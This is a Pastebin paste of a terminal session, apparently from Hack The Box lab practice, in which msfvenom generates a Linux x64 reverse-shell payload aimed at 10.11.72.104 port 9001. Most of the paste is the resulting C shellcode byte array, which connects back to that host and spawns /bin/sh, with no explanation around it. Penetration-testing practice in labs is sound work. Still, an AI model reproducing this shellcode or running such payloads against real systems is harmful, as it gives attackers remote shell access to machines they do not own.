Advertisement
tthtlc

Untitled

Feb 3rd, 2025
34
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.99 KB | None | 0 0
  1. (venv) 😊:/home/tthtlc/site/htb>msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.11.72.104 LPORT=9001 -f c
  2. Running the 'init' command for the database:
  3. Existing database found, attempting to start it
  4. Starting database at /home/tthtlc/.msf4/db...pg_ctl: another server might be running; trying to start server anyway
  5. waiting for server to start.... done
  6. server started
  7. success
  8. [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
  9. [-] No arch selected, selecting arch: x64 from the payload
  10. No encoder specified, outputting raw payload
  11. Payload size: 74 bytes
  12. Final size of c file: 338 bytes
  13. unsigned char buf[] =
  14. "\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97"
  15. "\x48\xb9\x02\x00\x23\x29\x0a\x0b\x48\x68\x51\x48\x89\xe6"
  16. "\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce"
  17. "\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f"
  18. "\x62\x69\x6e\x2f\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48"
  19. "\x89\xe6\x0f\x05";
  20. (venv) 😊:/home/tthtlc/site/htb>
  21.  
  22.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement